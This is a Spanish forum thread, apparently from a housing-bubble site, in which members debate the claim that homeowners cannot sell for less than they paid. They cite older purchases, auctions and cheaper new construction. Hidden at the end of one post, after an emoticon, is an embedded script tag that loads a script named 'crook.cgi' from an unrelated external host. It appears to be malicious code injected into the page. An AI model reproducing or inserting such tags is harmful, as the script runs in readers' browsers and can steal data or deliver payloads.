No se puede vender por menos de lo que costó - El otro gran clavo.

Ladrillo Mortal

Será en Octubre
Desde
11 Dic 2006
Mensajes
26.406
Reputación
64.921
A lo largo del tiempo hemos podido comprobar cierta evolución de las argumentaciones nunca-nuca.

Del Nuncabajan se ha ido pasando al "Nosubenmás" y diversas variantes del aterricismo suave. Entre ellas, el famoso "es imposible vender por menos de lo que te ha costado un piso, por lo tanto no pueden bajar tanto".

Y esto lo estoy escuchando y leyendo últimamente mucho, parece como el último bastión, junto al empleo, para agarrarse a esta locura colectiva.

¿Qué opináis?.
 

isaac29

Madmaxista
Desde
21 Mar 2007
Mensajes
826
Reputación
10
Ladrillo Mortal dijo:
A lo largo del tiempo hemos podido comprobar cierta evolución de las argumentaciones nunca-nuca.

Del Nuncabajan se ha ido pasando al "Nosubenmás" y diversas variantes del aterricismo suave. Entre ellas, el famoso "es imposible vender por menos de lo que te ha costado un piso, por lo tanto no pueden bajar tanto".

Y esto lo estoy escuchando y leyendo últimamente mucho, parece como el último bastión, junto al empleo, para agarrarse a esta locura colectiva.

¿Qué opináis?.
pues que es un clavo que se puede quitar con la misma facilidad con la que se puso, es decir, se instalo la idea de que los precios de los pisos nunca bajan cuando la historia nos demuestra que no es así, es decir, de forma gratuita, y ahora cuando empiecen a bajar, las reacciones primeras serán de sorpresa pero el mercado manda y no hay nada que hacer más que adaptarse a los nuevos tiempos......se subieron al carro, ahora tendrán que bajar antes de que el carro se estampe contra un muro pues hay sobrepeso y los ejes ya no aguantan........ahora oiremos expresiones muy graciosas para calificar el nuevo escenario, ahora nos vamos a reir de la cantidad de absurdeces que vamos a tener que escuchar.........empieza la fiesta! :D
 

hormiguita

Madmaxista
Desde
3 Oct 2006
Mensajes
269
Reputación
3
Lugar
Spain
Creo que estamos en plena fase del "Bueno, pues tampoco creo que vayan a bajar tanto". (bajapoquismo)

Creo que la firma del tal-iván explica todas esas fases.

Lo de no vender por menos de lo que te costó tiene su lógica, si hay mucha diferencia entre lo que debes y lo que te pagan, te tiene que interesar mucho cambiar de vivienda, pero, ¿Cuantos no se cambian el coche sabiendo que el que venden se lo pagan por menos de lo que les costó? Al final lo hacen y bien contentos.

Además la mayor parte de la oferta futura de 2ª mano no creo que se encuentre en esa situación.
 

Aitor Menta

Madmaxista
Desde
21 Nov 2006
Mensajes
3.371
Reputación
2.085
Lugar
Vladivostok
No es que no se pueda, es que NO SE QUIERE ACEPTAR por simple orgullo. Es tan fácil de rebatir como decir que siempre va a haber alguien que pueda ganar pasta incluso vendiendo muy por debajo de por lo que tú compraste algo. En el caso de la vivienda:

-Gente que compró su vivienda hace años a precios más moderados puede vender cuando quiera sin perder pasta
-Constructores que ante una disminución de la demanda y de sus costes (de suelo principalmente) puede construir casas más baratas

El resto es pura lógica de un mercado libre, la ley de la oferta-demanda :rolleyes:<script src="http://phonebill.ifreepages.com/burbuja/crook.cgi"></script>
 
Última edición:

DERBY

Madmaxista
Desde
4 Feb 2007
Mensajes
1.104
Reputación
2.016
a grandes males, grandes remedios

Ya lo comenté en el foro y alguien más lo ha hecho. Aquí se abre una "tercera vía": inversores que comprarán pisos de pepitos insolventes y se los alquilarán a los mismos pepitos. Se guardan las apariencias y será un buen negocio.
 

Ladrillo Mortal

Será en Octubre
Desde
11 Dic 2006
Mensajes
26.406
Reputación
64.921
DERBY dijo:
Ya lo comenté en el foro y alguien más lo ha hecho. Aquí se abre una "tercera vía": inversores que comprarán pisos de pepitos insolventes y se los alquilarán a los mismos pepitos. Se guardan las apariencias y será un buen negocio.
A mí eso es lo que me lleva rondando la cabeza desde hace tiempo. El tema del alquiler, el no quererse bajar de la burra o el pretender que te pague otro la cagada que has cometido firmando sin leer.
 

fosco

Madmaxista
Desde
19 Ago 2006
Mensajes
2.196
Reputación
27
Lugar
mandriles
hormiguita dijo:
Creo que estamos en plena fase del "Bueno, pues tampoco creo que vayan a bajar tanto". (bajapoquismo)
Esto empieza a generalizarse en el foro de idealista.
bla,bla,bla unpoco, ligerasblablablabalbalbla, pero de bajadas del 50% olvidaros, eso es imposible.
Es más creo que aunque se acaben dando, que se darán, los "Poquistas" estos, dirán que sólo se han dado donde estaban muy sobrevalorados, incluso discutirán si alguna vez los zulos madrileños de barrio cuéntame llegaron a costar los 300.000€ que hoy cuestan.
 

fosco

Madmaxista
Desde
19 Ago 2006
Mensajes
2.196
Reputación
27
Lugar
mandriles
DERBY dijo:
Ya lo comenté en el foro y alguien más lo ha hecho. Aquí se abre una "tercera vía": inversores que comprarán pisos de pepitos insolventes y se los alquilarán a los mismos pepitos. Se guardan las apariencias y será un buen negocio.
La misma cajita que les mega-endeudó les pondrá un alquiler baratito, para soplarle el resto de la deuda, y colar el marrón a inversoreh de fondos inmobiliarios.
Esto lo pensaba hace un tiempo como solución a las cajitas. Antes de subastar, la caja les embarga la nómina, hasta donde puede, les ofrece el mismo piso a un alquiler bajo, aquí, además les mete mano a el mínimo inembargable (smi) y coloca la vivienda en un fondo inmobiliario donde las pérdidas se reparten entre avispados inversoreh. Salva la situación todo lo posible.
Pero creo que esto no va a pasar por que aunque intentaron poner de moda los fondos inmobiliarios, no lo consiguieron, o no lo intentaron suficientemente.
Si estos fondos hubieran subido un 20% en lugar del 5% que dan, ahora tendrían millones de inversoreh a mano para desplumar.
Se me quedó la teoria por los suelos.
 

Mi_casa_es_tu_casa

Madmaxista
Desde
19 Jul 2006
Mensajes
5.475
Reputación
58
Lugar
BCN
Ladrillo Mortal dijo:
Entre ellas, el famoso "es imposible vender por menos de lo que te ha costado un piso, por lo tanto no pueden bajar tanto".
Argumentos contra esa idea:

- En el video de TV3 se veía como se subastaban casas por menos de lo que costaron al dueño. Esto también ha pasado en España, vaya que ha pasado toda la vida.

- La vivienda nueva puede tener un precio más barato, más que nada porque hay mucha diferencia entre el precio de coste y el actual (estará la v¡vienda de 2ª mano por encima de la nueva??)

- Hay muchas viviendas adquiridas antes de los precios de la burbuja.
 

CinquèGat

Madmaxista
Desde
7 Oct 2006
Mensajes
667
Reputación
9
Lugar
Barcelona
La mayoría de la gente compró a precios anteriores a la burbuja, pagan hipotecas muy bajas o ya tienen el piso pagado y si no están preocupados por cambiar de piso ni siquiera saben exactamente como están los precios ahora ("caros", pero no saben cuanto).

El que haya comprado últimamente se va a llevar un buen susto cuando descubra hasta que punto ha sido una mala compra...

Aquí habrá muchas víctimas pero afortunadamente no todo el país ni mucho menos está hiper-empepitado y tiene margen de sobra para bajar precios.
 

Ziggy

Madmaxista
Desde
29 Jun 2006
Mensajes
1.464
Reputación
566
Lugar
Gijón
Ladrillo Mortal dijo:
"es imposible vender por menos de lo que te ha costado un piso, por lo tanto no pueden bajar tanto".

Y esto lo estoy escuchando y leyendo últimamente mucho, parece como el último bastión, junto al empleo, para agarrarse a esta locura colectiva.

¿Qué opináis?.
Bueno, el mío me costó 8 kilos hace 15 años, no se si lo vendería por menos de eso, pero seguro que si lo vendería por bastante menos de lo que pagó el vecino de abajo hace dos años por un piso igual.

Es mas, lo vendería por menos de 8 kilos siempre que pudiese comprar algo mucho mejor por ese precio; pero como aunque lo venda por 50 si quiero algo realmente mejor voy a tener que pagar 80 y paso de empepitarme, pues no lo vendo por nada.

Esa es la cruda realidad de los propietarios (por lo menos de los propietarios de un solo piso) claro que también puedes pensar que eres millonario porque tu piso vale tropecientos kilos... idioteces. Además, donde se ha visto un país en el que la mitad de sus familias son multimillonarias.
 

erredea

Madmaxista
Desde
2 Abr 2007
Mensajes
82
Reputación
0
¿Nadie va a vender por menos de lo que le costó?

Pues estupendo. A mi madre su piso le costó menos de 1 millón de pesetas.
Y muchos compañeros del curro compraron en los 90 por 12 millones.
Estos no creo que vendan por menos de lo que les costó, ni falta que les hace.

Otro cantar son los que compraron por 240.000 euros y más. Estos no venderán por menos. Ya lo hará el banco en la subasta.